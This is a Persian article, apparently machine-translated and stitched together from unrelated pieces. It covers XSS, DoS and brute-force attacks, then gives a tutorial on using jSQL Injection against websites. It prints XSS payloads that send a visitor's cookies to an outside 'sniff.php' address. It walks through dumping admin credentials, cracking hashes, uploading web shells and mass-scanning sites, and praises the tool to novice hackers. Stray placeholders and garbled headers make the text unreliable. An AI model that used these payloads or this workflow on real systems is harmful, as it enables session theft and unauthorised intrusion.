    برای اجرای یک حمله XSS، هکر ما به دانش جاوا اسکریپت نیاز دارد. در نگاه اول، زبان بسیار ساده و بی ضرر است، زیرا به منابع کامپیوتری دسترسی ندارد. یک هکر فقط می تواند با جاوا اسکریپت در مرورگر کار کند، اما این کافی است. پس از همه، نکته اصلی این است که کد را وارد صفحه وب کنید.

    من در مورد روند حمله با جزئیات صحبت نمی کنم. من فقط اصول و معنای چگونگی این اتفاق را به شما خواهم گفت.

    یک هکر می تواند کد JS را به انجمن یا کتاب مهمان اضافه کند:

    document.location.href ="http://192.168.1.7/sniff.php?test"

    اسکریپت‌ها ما را به صفحه آلوده هدایت می‌کنند، جایی که کد اجرا می‌شود: خواه یک sniffer، نوعی ذخیره‌سازی یا یک سوء استفاده باشد که به نوعی کوکی‌های ما را از حافظه پنهان می‌دزدد.

    چرا جاوا اسکریپت؟ زیرا جاوا اسکریپت در رسیدگی به درخواست های وب عالی است و به کوکی ها دسترسی دارد. اما اگر اسکریپت ما را به سایتی ببرد، کاربر به راحتی متوجه آن خواهد شد. در اینجا هکر از گزینه حیله گرتری استفاده می کند - او به سادگی کد را در تصویر وارد می کند.

    Img=تصویر جدید();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    ما به سادگی یک تصویر ایجاد می کنیم و اسکریپت خود را به عنوان یک آدرس به آن اختصاص می دهیم.

    چگونه از خود در برابر این همه محافظت کنید؟ این بسیار ساده است - روی پیوندهای مشکوک کلیک نکنید.

    حملات DoS و DDos

    DoS (از انگلیسی Denial of Service - denial of service) یک حمله هکری به یک سیستم کامپیوتری با هدف شکست آن است. این ایجاد شرایطی است که در آن کاربران با حسن نیت سیستم نتوانند به منابع (سرور) سیستم ارائه شده دسترسی داشته باشند یا این دسترسی مشکل باشد. اگر در شرایط اضطراری، نرم افزار اطلاعات مهمی را تولید کند، خرابی سیستم می تواند گامی به سوی تصاحب آن باشد: به عنوان مثال، یک نسخه، بخشی از یک کد برنامه و غیره. اما اغلب این معیار فشار اقتصادی است: از دست دادن یک سرویس ساده که درآمد ایجاد می کند. صورت‌حساب‌های ارائه‌دهنده یا اقداماتی برای جلوگیری از حمله به طور قابل‌توجهی به "هدف" در جیب ضربه می‌زند. در حال حاضر، حملات DoS و DDoS محبوب‌ترین هستند، زیرا تقریباً به هر سیستمی اجازه می‌دهند بدون به جا گذاشتن شواهد قانونی قابل توجهی از کار بیفتند.

    تفاوت بین حمله DoS و DDos چیست؟

    DoS یک حمله است که به روشی هوشمندانه طراحی شده است. به عنوان مثال، اگر سرور صحت بسته های دریافتی را بررسی نکند، یک هکر می تواند درخواستی را ارائه دهد که پردازش آن برای همیشه طول می کشد و زمان پردازشگر کافی برای کار با سایر اتصالات وجود نخواهد داشت. بر این اساس، مشتریان از خدمات خودداری خواهند کرد. اما امکان اضافه بار یا غیرفعال کردن سایت های بزرگ شناخته شده از این طریق وجود نخواهد داشت. آنها مجهز به کانال های نسبتاً گسترده و سرورهای فوق العاده قدرتمند هستند که می توانند بدون هیچ مشکلی با چنین بار اضافی کنار بیایند.

    DDoS در واقع همان حمله DoS است. اما اگر در DoS یک بسته درخواست وجود داشته باشد، در DDoS می تواند صدها یا بیشتر از آنها وجود داشته باشد. حتی سرورهای فوق قدرتمند نیز ممکن است نتوانند با چنین بار اضافی کنار بیایند. بگذارید برای شما مثالی بزنم.

    حمله DoS زمانی است که شما در حال مکالمه با شخصی هستید، اما یک فرد بد اخلاق می آید و با صدای بلند شروع به فریاد زدن می کند. صحبت کردن یا غیرممکن است یا بسیار سخت. راه حل: با امنیت تماس بگیرید، که آرام می شود و فرد را از محل خارج می کند. حملات DDoS زمانی اتفاق می‌افتد که هزاران نفر از این افراد بد اخلاق وارد شوند. در این صورت حراست نمی‌تواند همه را ببندد و ببرد.

    DoS و DDoS از رایانه ها، به اصطلاح زامبی ها، انجام می شود. اینها رایانه های کاربرانی هستند که توسط هکرها هک شده اند و حتی مشکوک نیستند که دستگاه آنها در حمله به هر سروری شرکت می کند.

    چگونه از خود در برابر این محافظت کنید؟ به طور کلی، به هیچ وجه. اما شما می توانید کار را برای یک هکر سخت تر کنید. برای این کار باید یک هاست خوب با سرورهای قدرتمند انتخاب کنید.

    حمله Bruteforce

    یک توسعه‌دهنده می‌تواند سیستم‌های حفاظت از حمله زیادی را ارائه کند، اسکریپت‌هایی که نوشته‌ایم را به طور کامل بررسی کند، سایت را برای آسیب‌پذیری‌ها بررسی کند و غیره. اما زمانی که او به آخرین مرحله طرح‌بندی وب‌سایت می‌رسد، یعنی زمانی که به سادگی یک رمز عبور برای پنل مدیریت تعیین می‌کند، ممکن است یک چیز را فراموش کند. کلمه عبور!

    اکیداً توصیه نمی شود که یک رمز عبور ساده تنظیم کنید. این می تواند 12345، 1114457، vasya111، و غیره باشد. توصیه نمی شود رمزهای عبور کمتر از 10-11 کاراکتر تنظیم کنید. در غیر این صورت، ممکن است در معرض رایج ترین و بدون عارضه ترین حمله قرار بگیرید - نیروی بی رحم.

    Brute force یک حمله جستجوی کلمه عبور فرهنگ لغت با استفاده از برنامه های خاص است. لغت نامه ها می توانند متفاوت باشند: لاتین، شمارش با اعداد، مثلاً تا محدوده معین، مختلط (لاتین + اعداد)، و حتی دیکشنری هایی با کاراکترهای منحصر به فرد @#4$%&*~~`” وجود دارد. و غیره.

    البته اجتناب از این نوع حمله آسان است، تنها کاری که باید انجام دهید این است که یک رمز عبور پیچیده پیدا کنید. حتی یک کپچا می تواند شما را نجات دهد. همچنین، اگر سایت شما بر روی CMS ساخته شده باشد، بسیاری از آنها این نوع حمله را شناسایی کرده و IP را مسدود می کنند. همیشه باید به یاد داشته باشید که هر چه تعداد کاراکترهای مختلف رمز عبور بیشتر باشد، حدس زدن آن سخت تر است.

    هکرها چگونه کار می کنند؟ در بیشتر موارد، آنها یا مشکوک هستند یا بخشی از رمز عبور را از قبل می دانند. کاملاً منطقی است که فرض کنیم رمز عبور کاربر مطمئناً شامل 3 یا 5 کاراکتر نخواهد بود. چنین پسوردهایی منجر به هک مکرر می شوند. اصولاً هکرها محدوده ای از 5 تا 10 کاراکتر را انتخاب می کنند و چندین کاراکتر را که ممکن است از قبل بدانند اضافه می کنند. در مرحله بعد، رمزهای عبور با محدوده مورد نیاز ایجاد می شود. توزیع لینوکس کالی حتی برنامه هایی برای چنین مواردی دارد. و voila، حمله دیگر طولانی نخواهد بود، زیرا حجم فرهنگ لغت دیگر زیاد نیست. علاوه بر این، یک هکر می تواند از قدرت کارت گرافیک استفاده کند. برخی از آنها از سیستم CUDA پشتیبانی می کنند و سرعت جستجو تا 10 برابر افزایش می یابد. و اکنون می بینیم که حمله به این روش ساده کاملا واقعی است. اما این فقط وب سایت ها نیستند که در معرض زور وحشیانه قرار می گیرند.

    توسعه دهندگان عزیز هرگز سیستم امنیت اطلاعات را فراموش نکنید، زیرا امروزه بسیاری از مردم از جمله ایالت ها از این نوع حملات رنج می برند. به هر حال، بزرگترین آسیب پذیری شخصی است که همیشه می تواند در جایی حواسش پرت شود یا چیزی را از دست بدهد. ما برنامه نویس هستیم، اما ماشین های برنامه ریزی شده نیستیم. همیشه مراقب باشید، زیرا از دست دادن اطلاعات می تواند عواقب جدی داشته باشد!

    فایل دانلود شده را با دوبار کلیک اجرا کنید (شما باید یک ماشین مجازی داشته باشید).

    3. ناشناس بودن هنگام بررسی یک سایت برای تزریق SQL
    راه اندازی Tor و Privoxy در کالی لینوکس

    [بخش در حال توسعه]

    راه اندازی Tor و Privoxy در ویندوز

    [بخش در حال توسعه]

    تنظیمات پروکسی در jSQL Injection

    [بخش در حال توسعه]

    4. بررسی سایت برای تزریق SQL با تزریق jSQL

    کار با برنامه فوق العاده ساده است. فقط آدرس وب سایت را وارد کرده و ENTER را فشار دهید.

    تصویر زیر نشان می دهد که سایت در برابر سه نوع تزریق SQL آسیب پذیر است (اطلاعات مربوط به آنها در گوشه سمت راست پایین نشان داده شده است). با کلیک بر روی نام تزریق ها می توانید روش مورد استفاده را تغییر دهید:

    همچنین پایگاه های داده موجود قبلا به ما نمایش داده شده است.

    می توانید محتویات هر جدول را مشاهده کنید:

    به طور معمول، جالب ترین چیز در مورد جداول، اعتبار مدیر است.

    اگر خوش شانس هستید و داده های مدیر را پیدا کردید، برای خوشحالی خیلی زود است. هنوز باید پنل مدیریت را پیدا کنید که در آن این داده ها را وارد کنید.

    5. پنل های مدیریت را با تزریق jSQL جستجو کنید

    برای این کار به تب بعدی بروید. در اینجا با لیستی از آدرس های احتمالی مواجه می شویم. می توانید یک یا چند صفحه را برای بررسی انتخاب کنید:

    راحتی در این واقعیت نهفته است که شما نیازی به استفاده از برنامه های دیگر ندارید.

    متأسفانه، برنامه نویسان بی دقت زیادی وجود ندارند که رمزهای عبور را در متن واضح ذخیره می کنند. اغلب در خط رمز عبور چیزی شبیه به آن را می بینیم

    8743b52063cd84097a65d1633f5c74f5

    این یک هش است. شما می توانید آن را با استفاده از نیروی بی رحم رمزگشایی کنید. و... jSQL Injection دارای یک بروت فورس داخلی است.

    6. هش‌های Brute Force با استفاده از jSQL Injection

    راحتی بدون شک این است که شما نیازی به جستجوی برنامه های دیگر ندارید. پشتیبانی از بسیاری از محبوب ترین هش ها وجود دارد.

    این بهترین گزینه نیست. برای تبدیل شدن به یک گورو در رمزگشایی هش ها، کتاب "" به زبان روسی توصیه می شود.

    اما، البته، زمانی که برنامه دیگری در دسترس نیست یا زمانی برای مطالعه وجود ندارد، jSQL Injection با عملکرد brute force داخلی آن بسیار مفید خواهد بود.

    تنظیماتی وجود دارد: می توانید تعیین کنید کدام کاراکترها در رمز عبور گنجانده شده است، محدوده طول رمز عبور.

    7. عملیات فایل پس از تشخیص تزریق SQL

    علاوه بر عملیات با پایگاه داده - خواندن و اصلاح آنها، در صورت شناسایی تزریق SQL، عملیات فایل زیر را می توان انجام داد:

    • خواندن فایل ها روی سرور
    • آپلود فایل های جدید روی سرور
    • آپلود پوسته ها روی سرور

    و همه اینها در jSQL Injection پیاده سازی شده است!

    محدودیت هایی وجود دارد - سرور SQL باید دارای امتیازات فایل باشد. مدیران سیستم هوشمند آنها را غیرفعال کرده اند و نمی توانند به سیستم فایل دسترسی پیدا کنند.

    بررسی وجود امتیازات فایل بسیار ساده است. به یکی از تب ها (خواندن فایل ها، ایجاد پوسته، آپلود فایل جدید) بروید و سعی کنید یکی از عملیات مشخص شده را انجام دهید.

    نکته بسیار مهم دیگر - ما باید دقیقاً مسیر مطلق فایلی را که با آن کار خواهیم کرد بدانیم - در غیر این صورت هیچ چیز کار نخواهد کرد.

    به اسکرین شات زیر نگاه کنید:

    به هر تلاشی برای کار بر روی یک فایل، به ما پاسخ داده می شود: بدون امتیاز FILE (بدون امتیاز فایل). و در اینجا هیچ کاری نمی توان کرد.

    اگر در عوض خطای دیگری دارید:

    مشکل در نوشتن در [directory_name]

    این بدان معناست که شما مسیر مطلقی را که می خواهید فایل را در آن بنویسید به اشتباه مشخص کرده اید.

    برای حدس زدن یک مسیر مطلق، باید حداقل سیستم عاملی را که سرور روی آن اجرا می‌شود، بشناسید. برای انجام این کار، به تب Network بروید.

    این مدخل (خط Win64) به ما دلیلی می دهد که فرض کنیم با سیستم عامل ویندوز سروکار داریم:

    Keep-Alive: timeout=5, max=99 سرور: Apache/2.4.17 (Win64) PHP/7.0.0RC6 اتصال: Keep-Alive روش: HTTP/1.1 200 OK Content-Length: 353 تاریخ: جمعه، 115 دسامبر 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 نوع محتوا: text/html; charset=UTF-8

    در اینجا تعدادی یونیکس (*BSD، Linux) داریم:

    Transfer-Encoding: chunked تاریخ: جمعه، 11 دسامبر 2015، 11:57:02 GMT روش: HTTP/1.1 200 OK Keep-Alive: timeout=3، max=100 اتصال: keep-alive نوع محتوا: text/html X- پشتیبانی شده توسط: PHP/5.3.29 سرور: Apache/2.2.31 (یونیکس)

    و در اینجا ما CentOS را داریم:

    روش: HTTP/1.1 200 OK منقضی می‌شود: پنج‌شنبه، 19 نوامبر 1981، 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ اتصال: keep-alive X-Cache-Lookup: MISS از t1.hoster.ru:6666 سرور: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS از t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 پراگما: بدون کش تاریخ: جمعه, 11 دسامبر 2015 12:08:54 GMT انتقال-کدگذاری: تکه تکه شده نوع محتوا: متن/html. charset=WINDOWS-1251

    در ویندوز، یک پوشه معمولی برای سایت ها C:\Server\data\htdocs\ . اما، در واقع، اگر کسی "به فکر" ساخت سرور در ویندوز افتاده باشد، به احتمال زیاد، این شخص چیزی در مورد امتیازات نشنیده است. بنابراین، باید مستقیماً از دایرکتوری C:/Windows/ شروع به امتحان کنید:

    همانطور که می بینید، بار اول همه چیز خوب پیش رفت.

    اما خود پوسته های تزریق jSQL تردیدهایی را در ذهن من ایجاد می کند. اگر امتیاز فایل دارید، می توانید به راحتی چیزی را با یک رابط وب آپلود کنید.

    8. بررسی انبوه سایت ها برای تزریق SQL

    و حتی این تابع در jSQL Injection نیز موجود است. همه چیز بسیار ساده است - لیستی از سایت ها را دانلود کنید (می توانید از یک فایل وارد کنید)، مواردی را که می خواهید بررسی کنید انتخاب کنید و برای شروع عملیات روی دکمه مناسب کلیک کنید.

    نتیجه گیری از jSQL Injection

    jSQL Injection یک ابزار خوب و قدرتمند برای جستجو و سپس استفاده از تزریق SQL موجود در وب سایت ها است. مزایای بدون شک آن: سهولت استفاده، توابع مرتبط داخلی. jSQL Injection می تواند بهترین دوست یک مبتدی در هنگام تجزیه و تحلیل وب سایت ها باشد.

    در میان کاستی ها، من به عدم امکان ویرایش پایگاه داده ها اشاره می کنم (حداقل این قابلیت را پیدا نکردم). مانند تمام ابزارهای رابط کاربری گرافیکی، یکی از معایب این برنامه را می توان به عدم استفاده از آن در اسکریپت ها نسبت داد. با این وجود، برخی از اتوماسیون ها نیز در این برنامه امکان پذیر است - به لطف عملکرد داخلی بررسی انبوه سایت.

    استفاده از برنامه jSQL Injection بسیار راحت تر از sqlmap است. اما sqlmap از انواع بیشتری از تزریق SQL پشتیبانی می کند، گزینه هایی برای کار با فایروال فایل ها و برخی عملکردهای دیگر دارد.

    خط پایین: jSQL Injection بهترین دوست یک هکر تازه کار است.

    راهنمای این برنامه در دایره المعارف لینوکس کالی را می توانید در این صفحه پیدا کنید: http://kali.tools/?p=706